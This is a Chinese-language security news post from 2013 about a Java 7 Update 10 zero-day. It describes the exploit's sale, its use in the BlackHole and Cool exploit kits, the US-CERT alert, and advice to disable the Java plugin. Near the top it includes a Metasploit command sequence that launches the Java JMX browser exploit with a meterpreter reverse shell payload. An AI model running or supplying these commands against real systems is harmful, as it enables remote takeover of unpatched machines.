[更新]新年伊始,Java惊爆首个0day

2013-01-11 245612人围观 ,发现 30 个不明物体 资讯

11:00 UPDATE: MSF已更新相关渗透测试模块

use exploit/windows/browser/ie_cbutton_uaf
use exploit/multi/browser/java_jre17_jmxbean
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid

详细链接及视频:
http://eromang.zataz.com/2013/01/10/java-applet-jmx-0day-remote-code-execution-metasploit-demo/

新年伊始,人们还沉浸在节日的欢乐气氛中,Java又赠送给大家一份豪礼,让各位欢欢乐乐过个大年。日前,Java又爆了一个新的0day,可能让攻击者获取计算机管理权限,Java 7 Update 10或更早的版本中存在该漏洞,该漏洞可以允许未经身份验证的远程攻击者在受害者系统上执行任意代码,该漏洞首先在‘Malware Don’t Need Coffee’博客上发表。

目前该漏洞在网络有两个EXP,分别出售价格为700美元和1500美元,在去年八月发现的CVE-2012-4681漏洞中使用的是类似的手法,查看地址

两个EXP被黑客用来传播恶意软件,国外著名的黑名工具包BlackHole Exploit Kit和Cool Exploit Kit已经更新了该EXP。

BlackHole作者Paunch昨天在网络公布,称在BlackHole添加该JAVA 0day是送给软件用户的新年福利,经AlienVault Labs确认,BlackHole工具中使用的EXP证实为Java最新的漏洞。

US-CERT也发出了VU#625617预警。 未受信任的Java applet可通过调用setSecurityManager()函数提升权限,从而在没有代码签名的情况下获得 full privileges。

更多截获到的攻击样本请见:

http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html

该漏洞影响分布图如下:


目前建议只能禁用浏览器的Java plugin来防范该漏洞攻击:
How to disable Java in Internet Explorer
How to disable Java in Firefox
How to disable Java in Chrome

发表评论

已有 30 条评论

取消
Loading...
css.php